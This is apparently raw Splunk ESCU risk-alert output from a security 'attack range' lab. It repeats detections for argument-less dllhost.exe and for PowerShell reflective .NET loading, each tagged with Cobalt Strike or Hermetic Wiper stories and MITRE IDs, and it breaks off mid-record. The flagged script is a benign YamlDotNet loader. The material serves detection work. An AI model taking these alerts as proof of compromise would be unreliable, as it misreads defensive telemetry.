\"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="4820", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664730000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664730000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x12d4", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664733331, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T16:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T16:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664733331, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T16:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T16:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664733331, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T16:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T16:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664733331, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T16:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T16:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664726400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664726400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="1752", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664726400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664726400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x6d8", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664729734, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T15:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T15:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664729734, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T15:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T15:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664729734, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR 